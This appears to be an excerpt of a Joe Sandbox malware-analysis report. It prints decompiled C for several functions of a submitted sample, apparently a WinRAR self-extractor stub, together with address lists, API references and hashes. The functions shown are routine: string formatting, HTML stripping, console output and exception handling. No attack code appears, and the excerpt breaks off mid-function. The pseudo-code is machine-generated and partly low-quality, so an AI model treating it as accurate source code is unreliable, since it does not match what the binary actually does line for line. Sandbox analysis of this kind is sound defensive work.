0x00b62399
0x00b62399
0x00b6239c
0x00b623a5
0x00b623aa
0x00b623ab
0x00000000
0x00b623ab
0x00b62849
0x00b62849
0x00b62849
0x00b6284d
0x00b62853
0x00b62858
0x00000000
0x00000000
0x00000000
0x00b62858
0x00b6232d
0x00b6227f
0x00b62860

APIs

_swprintf.LIBCMT ref: 00B62536

Part of subcall function 00B64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B640A5

Part of subcall function 00B705DA: _wcslen.LIBCMT ref: 00B705E0

Strings

;%u, xrefs: 00B62523
x%u, xrefs: 00B626FD
xc%u, xrefs: 00B6275A

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: ed0a2eb5183ca39585740096d0f74dde4e04269b725080f92a1481ae219dc382
Instruction ID: a84d683d693f31638c95919330d293c8ecf3bbb18a5dd79fb43c8d7982a8001a
Opcode Fuzzy Hash: ed0a2eb5183ca39585740096d0f74dde4e04269b725080f92a1481ae219dc382
Instruction Fuzzy Hash: 12F1F9716047409BEB25DF288895BFE7BD59F90300F0845EDEDCA9B283CB6C9945C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B79CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00B79CFE(void* __eflags, signed short* _a4) {
				signed int* _v4;
				intOrPtr _v8;
				void* __ecx;
				signed int* _t17;
				signed int _t18;
				void* _t21;
				void* _t22;
				void* _t24;
				signed short _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed short* _t29;
				void* _t30;
				signed int _t31;
				signed int _t32;
				void* _t33;
				signed int _t36;
				void* _t38;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed short _t45;
				signed int _t47;
				short _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed short* _t53;
				signed int* _t55;
				short* _t56;
				short* _t57;
				signed short* _t58;
				signed int* _t59;
				intOrPtr _t60;
				signed int* _t77;

				_t58 = _a4;
				_push(2 + E00B83E13(_t58) * 2);
				_t17 = E00B83E33(_t38);
				_t59 = _t17;
				_v4 = _t59;
				if(_t59 == 0) {
					return _t17;
				}
				_t18 = E00B795AA(_t58);
				_t42 =  *_t58 & 0x0000ffff;
				_t36 = _t18;
				_t55 = _t59;
				if(_t42 == 0) {
					L47:
					return _t59;
				} else {
					_push(0xd);
					_push(0x20);
					_v8 = 0x3e;
					do {
						_t43 = _t42 & 0x0000ffff;
						while(_t43 != 0x3c) {
							if(_t36 == 0) {
								L11:
								_t36 = 0;
								__eflags = 0;
								if(0 == 0) {
									L20:
									_t27 =  *_t58 & 0x0000ffff;
									__eflags = _t27;
									if(__eflags == 0) {
										L27:
										_t28 =  *_t58 & 0x0000ffff;
										_t52 = 0x20;
										_t43 = _t28;
										_t72 = _t28;
										_t26 = 0xd;
										if(_t28 != 0) {
											continue;
										}
										break;
									}
									__eflags = _t27 - _t52;
									if(__eflags != 0) {
										L24:
										 *_t55 = _t27;
										L25:
										_t55 =  &(_t55[0]);
										L26:
										_t58 =  &(_t58[1]);
										goto L27;
									}
									__eflags = _t55 - _t59;
									if(__eflags == 0) {
										goto L24;
									}
									__eflags =  *((intOrPtr*)(_t55 - 2)) - _t52;
									if(__eflags == 0) {
										goto L26;
									}
									goto L24;
								}
								__eflags = _t43 - 0x26;
								if(_t43 != 0x26) {
									goto L20;
								}
								_t29 = 0;
								__eflags = 0;
								do {
									_t53 = _t29 + _t58;
									_t47 =  *_t53 & 0x0000ffff;
									__eflags = _t47;
									if(_t47 == 0) {
										break;
									}
									__eflags = _t47 - 0x3b;
									if(_t47 == 0x3b) {
										_t8 =  &(_t53[1]); // 0x22
										_t58 = _t8;
										_t36 = 1;
									}
									_t29 = _t29 + 2;
									__eflags = _t29 - 0x28;
								} while (_t29 < 0x28);
								__eflags = _t36;
								if(__eflags != 0) {
									goto L27;
								}
								_t52 = 0x20;
								goto L20;
							}
							if(_t43 == _t26) {
								L8:
								if(_t55 == _t59 ||  *((intOrPtr*)(_t55 - 2)) != _t52) {
									 *_t55 = _t52;
									goto L25;
								} else {
									goto L26;
								}
							}
							_t30 = 0xa;
							if(_t43 != _t30) {
								goto L11;
							}
							goto L8;
						}
						_t21 = E00B71FDD(_t72, _t58, L"</p>", 4);
						_t36 = _t36 & 0xffffff00 | _t21 == 0x00000000;
						_t74 = _t21;
						if(_t21 == 0 || E00B71FDD(_t74, _t58, L"<br>", 4) == 0) {
							_t44 = 0xd;
							_t22 = 2;
							 *_t55 = _t44;
							_t56 = _t55 + _t22;
							_t49 = 0xa;
							 *_t56 = _t49;
							_t55 = _t56 + _t22;
							if(_t36 != 0) {
								 *_t55 = _t44;
								_t57 = _t55 + _t22;
								 *_t57 = _t49;
								_t55 = _t57 + _t22;
								_t77 = _t55;
							}
						}
						 *_t55 = 0;
						_t24 = E00B71FDD(_t77, _t58, L"<style>", 7);
						_t45 =  *_t58 & 0x0000ffff;
						_t50 = _t45;
						if(_t24 != 0) {
							_t51 = _t45;
							__eflags = _t45;
							if(_t45 == 0) {
								L44:
								_t25 = _t51 & 0x0000ffff;
								__eflags = _t51 - _v8;
								if(__eflags == 0) {
									_t58 =  &(_t58[1]);
									__eflags = _t58;
									_t25 =  *_t58 & 0x0000ffff;
								}
								goto L46;
							}
							_t60 = _v8;
							while(1) {
								_t51 = _t45 & 0x0000ffff;
								__eflags = _t45 - _t60;
								if(_t45 == _t60) {
									break;
								}
								_t58 =  &(_t58[1]);
								_t31 =  *_t58 & 0x0000ffff;
								_t45 = _t31;
								_t51 = _t31;
								__eflags = _t31;
								if(_t31 != 0) {
									continue;
								}
								break;
							}
							_t59 = _v4;
							goto L44;
						} else {
							_t32 = _t50;
							_t79 = _t45;
							if(_t45 == 0) {
								L38:
								_t25 = _t32 & 0x0000ffff;
								goto L46;
							} else {
								goto L34;
							}
							while(1) {
								L34:
								_t33 = E00B71FDD(_t79, _t58, L"</style>", 8);
								_t58 =  &(_t58[1]);
								if(_t33 == 0) {
									break;
								}
								_t32 =  *_t58 & 0x0000ffff;
								if(_t32 != 0) {
									continue;
								}
								goto L38;
							}
							_t58 =  &(_t58[7]);
							__eflags = _t58;
							_t32 =  *_t58 & 0x0000ffff;
							goto L38;
						}
						L46:
						_t52 = 0x20;
						_t42 = _t25 & 0x0000ffff;
						_t26 = 0xd;
					} while (_t25 != 0);
					goto L47;
				}
			}

0x00b79d02
0x00b79d16
0x00b79d17
0x00b79d1c
0x00b79d1e
0x00b79d26
0x00b79ecb
0x00b79ecb
0x00b79d30
0x00b79d35
0x00b79d38
0x00b79d3a
0x00b79d3f
0x00b79ec3
0x00000000
0x00b79d45
0x00b79d45
0x00b79d48
0x00b79d4b
0x00b79d53
0x00b79d53
0x00b79d56
0x00b79d62
0x00b79d80
0x00b79d80
0x00b79d82
0x00b79d84
0x00b79db2
0x00b79db2
0x00b79db5
0x00b79db8
0x00b79dd2
0x00b79dd2
0x00b79dd7
0x00b79dda
0x00b79ddc
0x00b79ddf
0x00b79de0
0x00000000
0x00000000
0x00000000
0x00b79de0
0x00b79dba
0x00b79dbd
0x00b79dc9
0x00b79dc9
0x00b79dcc
0x00b79dcc
0x00b79dcf
0x00b79dcf
0x00000000
0x00b79dcf
0x00b79dbf
0x00b79dc1
0x00000000
0x00000000
0x00b79dc3
0x00b79dc7
0x00000000
0x00000000
0x00000000
0x00b79dc7
0x00b79d86
0x00b79d8a
0x00000000
0x00000000
0x00b79d8c
0x00b79d8c
0x00b79d8e
0x00b79d8e
0x00b79d91
0x00b79d94
0x00b79d97
0x00000000
0x00000000
0x00b79d99
0x00b79d9c
0x00b79d9e
0x00b79d9e
0x00b79da1
0x00b79da1
0x00b79da3
0x00b79da6
0x00b79da6
0x00b79dab
0x00b79dad
0x00000000
0x00000000
0x00b79db1
0x00000000
0x00b79db1
0x00b79d67
0x00b79d71
0x00b79d73
0x00b79d7b
0x00000000
0x00000000
0x00000000
0x00000000
0x00b79d73
0x00b79d6b
0x00b79d6f
0x00000000
0x00000000
0x00000000
0x00b79d6f
0x00b79dee
0x00b79df5
0x00b79df8
0x00b79dfa
0x00b79e0f
0x00b79e12
0x00b79e13
0x00b79e16
0x00b79e1a
0x00b79e1b
0x00b79e1e
0x00b79e22
0x00b79e24
0x00b79e27
0x00b79e29
0x00b79e2c
0x00b79e2c
0x00b79e2c
0x00b79e22
0x00b79e38
0x00b79e3b
0x00b79e40
0x00b79e43
0x00b79e47
0x00b79e7b
0x00b79e7d
0x00b79e80
0x00b79ea1
0x00b79ea1
0x00b79ea4
0x00b79ea9
0x00b79eab
0x00b79eab
0x00b79eae
0x00b79eae
0x00000000
0x00b79ea9
0x00b79e82
0x00b79e86
0x00b79e86
0x00b79e89
0x00b79e8c
0x00000000
0x00000000
0x00b79e8e
0x00b79e91
0x00b79e94
0x00b79e96
0x00b79e98
0x00b79e9b
0x00000000
0x00000000
0x00000000
0x00b79e9b
0x00b79e9d
0x00000000
0x00b79e49
0x00b79e49
0x00b79e4b
0x00b79e4e
0x00b79e76
0x00b79e76
0x00000000
0x00000000
0x00000000
0x00000000
0x00b79e50
0x00b79e50
0x00b79e58
0x00b79e5d
0x00b79e62
0x00000000
0x00000000
0x00b79e64
0x00b79e6c
0x00000000
0x00000000
0x00000000
0x00b79e6e
0x00b79e70
0x00b79e70
0x00b79e73
0x00000000
0x00b79e73
0x00b79eb1
0x00b79eb3
0x00b79eb6
0x00b79ebc
0x00b79ebc
0x00000000
0x00b79d53

APIs

_wcslen.LIBCMT ref: 00B79D0A

Strings

</style>, xrefs: 00B79E52
</p>, xrefs: 00B79DE8
>, xrefs: 00B79D4B
<style>, xrefs: 00B79E30
<br>, xrefs: 00B79DFE

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 996f585ea07716ce1f43d67c8a6f0a9344ad061e37e10834f00f4d15c9450e8b
Instruction ID: 35d35e28e0eaeec4f80c4115cdb8d179f1e720cfe6ab81e6fe17a549da3d58bc
Opcode Fuzzy Hash: 996f585ea07716ce1f43d67c8a6f0a9344ad061e37e10834f00f4d15c9450e8b
Instruction Fuzzy Hash: E7514A6674032395DB309A299C21B7673E1DFA1750F68C4BBF9E9CB2C0FB658C858361

Uniqueness

Uniqueness Score: -1.00%

Function 00B8F68D Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B8F68D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				signed int _t128;
				signed char* _t129;
				intOrPtr* _t130;
				signed int _t131;
				void* _t132;

				_t78 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t78 ^ _t131;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t129 = _a12;
				_v52 = _t129;
				_v48 = _t117;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xbc2290 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t129;
				_t86 = GetConsoleCP();
				_t130 = _a4;
				_v60 = _t86;
				 *_t130 = 0;
				 *((intOrPtr*)(_t130 + 4)) = 0;
				 *((intOrPtr*)(_t130 + 8)) = 0;
				while(_t129 < _v40) {
					_v28 = 0;
					_v31 =  *_t129;
					_t128 =  *(0xbc2290 + _v48 * 4);
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						_t92 = E00B8A767(_t115, _t128);
						_t128 = 0x8000;
						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t129);
							goto L8;
						} else {
							if(_t129 >= _v40) {
								_t128 = _v48;
								 *((char*)( *((intOrPtr*)(0xbc2290 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
								 *( *((intOrPtr*)(0xbc2290 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0xbc2290 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
							} else {
								_t112 = E00B8930D( &_v28, _t129, 2);
								_t132 = _t132 + 0xc;
								if(_t112 != 0xffffffff) {
									_t129 =  &(_t129[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00B8930D();
						_t132 = _t132 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t129 =  &(_t129[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t130 = GetLastError();
								} else {
									_t48 = _t130 + 8; // 0xff76e900
									 *((intOrPtr*)(_t130 + 4)) =  *_t48 - _v52 + _t129;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00B7FBBC(_t130, _t115, _v8 ^ _t131, _t128, _t129, _t130);
			}

0x00b8f695
0x00b8f69c
0x00b8f69f
0x00b8f6a7
0x00b8f6ab
0x00b8f6b7
0x00b8f6ba
0x00b8f6bd
0x00b8f6c4
0x00b8f6cc
0x00b8f6cf
0x00b8f6d5
0x00b8f6db
0x00b8f6e0
0x00b8f6e2
0x00b8f6e5
0x00b8f6ea
0x00b8f6f4
0x00b8f6fb
0x00b8f6fe
0x00b8f705
0x00b8f70c
0x00b8f727
0x00b8f72f
0x00b8f738
0x00b8f75e
0x00b8f760
0x00000000
0x00b8f73a
0x00b8f73d
0x00b8f804
0x00b8f810
0x00b8f81b
0x00b8f820
0x00b8f743
0x00b8f74a
0x00b8f74f
0x00b8f755
0x00b8f75b
0x00000000
0x00b8f75b
0x00b8f755
0x00b8f73d
0x00b8f70e
0x00b8f712
0x00b8f715
0x00b8f71b
0x00b8f71d
0x00b8f720
0x00b8f724
0x00b8f761
0x00b8f764
0x00b8f765
0x00b8f76a
0x00b8f770
0x00b8f776
0x00b8f785
0x00b8f78b
0x00b8f791
0x00b8f796
0x00b8f7b2
0x00b8f825
0x00b8f82b
0x00b8f7b4
0x00b8f7b4
0x00b8f7bc
0x00b8f7c5
0x00b8f7cb
0x00000000
0x00b8f7cd
0x00b8f7cf
0x00b8f7d2
0x00b8f7eb
0x00000000
0x00b8f7ed
0x00b8f7f1
0x00b8f7f3
0x00b8f7f6
0x00000000
0x00b8f7f6
0x00b8f7f1
0x00b8f7eb
0x00b8f7cb
0x00b8f7c5
0x00b8f7b2
0x00b8f796
0x00b8f770
0x00000000
0x00b8f7f9
0x00b8f7f9
0x00b8f82d
0x00b8f83f

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00B8FE02,00000000,00000000,00000000,00000000,00000000,00B8529F), ref: 00B8F6CF
__fassign.LIBCMT ref: 00B8F74A
__fassign.LIBCMT ref: 00B8F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00B8F78B
WriteFile.KERNEL32(?,00000000,00000000,00B8FE02,00000000,?,?,?,?,?,?,?,?,?,00B8FE02,00000000), ref: 00B8F7AA
WriteFile.KERNEL32(?,00000000,00000001,00B8FE02,00000000,?,?,?,?,?,?,?,?,?,00B8FE02,00000000), ref: 00B8F7E3

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: b32c1b47e2043be3af4ccefccdb41fd4bc5ac17c10279d79348f8314ffd1d2e7
Instruction ID: 8c38369c6f4b15285b118268b93497dd17118387ae674745b1aa645271867b9a
Opcode Fuzzy Hash: b32c1b47e2043be3af4ccefccdb41fd4bc5ac17c10279d79348f8314ffd1d2e7
Instruction Fuzzy Hash: 635195B5D0024A9FDB10DFA8DC85AEEFBF4EF09700F1441AAE555E7261D770AA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B82900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B82900(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00B92567(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0xb9e7ac;
				E00B828C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0xb9e7ac);
				E00B8396C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E00B83AF0(_t77, 0xfffffffe, _t96, 0xb9e7ac);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00B83A90(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00B828C0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0xb958dc;
											if(__eflags != 0) {
												_t72 = E00B92090(__eflags, 0xb958dc);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0xb958dc; // 0xb80150
													 *0xb93278(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00B83AD0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E00B83AF0(_t64, _t93, _t96, 0xb9e7ac);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00B828C0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00B83AB0();
										asm("int3");
										__eflags = E00B83B07();
										if(__eflags != 0) {
											_t67 = E00B82B8C(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E00B83B43();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x00b82900
0x00b82907
0x00b8290b
0x00b8290c
0x00b82912
0x00b8291e
0x00b82920
0x00b82926
0x00b82926
0x00b8292f
0x00b82931
0x00b82934
0x00b82937
0x00b8293f
0x00b82944
0x00b82947
0x00b8294a
0x00b82951
0x00b829ad
0x00b829b0
0x00b829b8
0x00b829bf
0x00000000
0x00b829bf
0x00000000
0x00b82953
0x00b82953
0x00b82959
0x00b8295f
0x00b82965
0x00b829d0
0x00b829d9
0x00b82967
0x00b82967
0x00b82967
0x00b8296d
0x00b82970
0x00b82973
0x00b82976
0x00b82979
0x00b8297e
0x00b82994
0x00000000
0x00b82980
0x00b82980
0x00b82982
0x00b82987
0x00b82989
0x00b8298c
0x00b8298e
0x00b829a4
0x00b829c4
0x00b829c4
0x00b829c8
0x00000000
0x00b82990
0x00b82990
0x00b829da
0x00b829dd
0x00b829e3
0x00b829e5
0x00b829ec
0x00b829f3
0x00b829f8
0x00b829fb
0x00b829fd
0x00b829ff
0x00b82a0c
0x00b82a12
0x00b82a14
0x00b82a17
0x00b82a17
0x00b82a1a
0x00b82a1a
0x00b829ec
0x00b82a20
0x00b82a22
0x00b82a27
0x00b82a2a
0x00b82a2d
0x00b82a35
0x00b82a39
0x00b82a3e
0x00b82a3e
0x00b82a41
0x00b82a45
0x00b82a48
0x00b82a55
0x00b82a58
0x00b82a5d
0x00b82a63
0x00b82a65
0x00b82a6a
0x00b82a6f
0x00b82a71
0x00b82a7c
0x00b82a73
0x00b82a73
0x00000000
0x00b82a73
0x00b82a67
0x00b82a67
0x00b82a67
0x00b82a69
0x00b82a69
0x00b82992
0x00000000
0x00b82992
0x00b82990
0x00b8298e
0x00000000
0x00b82997
0x00b82997
0x00b82999
0x00b829a0
0x00000000
0x00b829a2
0x00000000
0x00b829a0
0x00b82965
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00B82937
___except_validate_context_record.LIBVCRUNTIME ref: 00B8293F
_ValidateLocalCookies.LIBCMT ref: 00B829C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00B829F3
_ValidateLocalCookies.LIBCMT ref: 00B82A48

Strings

csm, xrefs: 00B829DD

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a436764fbcf5d12c21ec208f2579cb6c06146fce03a009fad640491208907781
Instruction ID: 64dc6280f8140641d73539582cc658cb2b5208a45ff12d5652c1947d4441bc1f
Opcode Fuzzy Hash: a436764fbcf5d12c21ec208f2579cb6c06146fce03a009fad640491208907781
Instruction Fuzzy Hash: 7C419534A00208AFCF14EF68C885A9E7BF5EF44724F1481E5E8156B3B2D771DA55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B79ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00B79ED5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t33;
				intOrPtr _t34;
				struct HWND__* _t44;
				intOrPtr* _t52;
				void* _t60;
				WCHAR* _t67;
				struct HWND__* _t68;

				_t68 = _a8;
				_t52 = __ecx;
				 *(__ecx + 8) = _t68;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t68, 0);
				E00B79C04(_t52, _a4);
				if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
					L00B83E2E( *((intOrPtr*)(_t52 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t33 = E00B87625(_t52, _t60);
				} else {
					_t33 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x1c)) = _t33;
				if(_a16 != 0) {
					_push(_a16);
					_t34 = E00B87625(_t52, _t60);
				} else {
					_t34 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x20)) = _t34;
				GetWindowRect(_t68,  &_v16);
				 *0xbc3108(0,  *0xbc3154(_t68,  &_v16, 2));
				if( *(_t52 + 4) != 0) {
					 *0xbc3110( *(_t52 + 4));
				}
				_t40 = _v36;
				_t20 = _t40 + 1; // 0x1
				_t44 =  *0xbc3118(0, L"RarHtmlClassName", 0, 0x40000000, _t20, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xbc3154(_t68, 0,  *_t52, _t52, _t60));
				 *(_t52 + 4) = _t44;
				if( *((intOrPtr*)(_t52 + 0x10)) != 0) {
					__eflags = _t44;
					if(_t44 != 0) {
						ShowWindow(_t44, 5);
						return  *0xbc310c( *(_t52 + 4));
					}
				} else {
					if(_t68 != 0 &&  *((intOrPtr*)(_t52 + 0x20)) == 0) {
						_t78 =  *((intOrPtr*)(_t52 + 0x1c));
						if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
							_t44 = E00B79CFE(_t78,  *((intOrPtr*)(_t52 + 0x1c)));
							_t67 = _t44;
							if(_t67 != 0) {
								ShowWindow(_t68, 5);
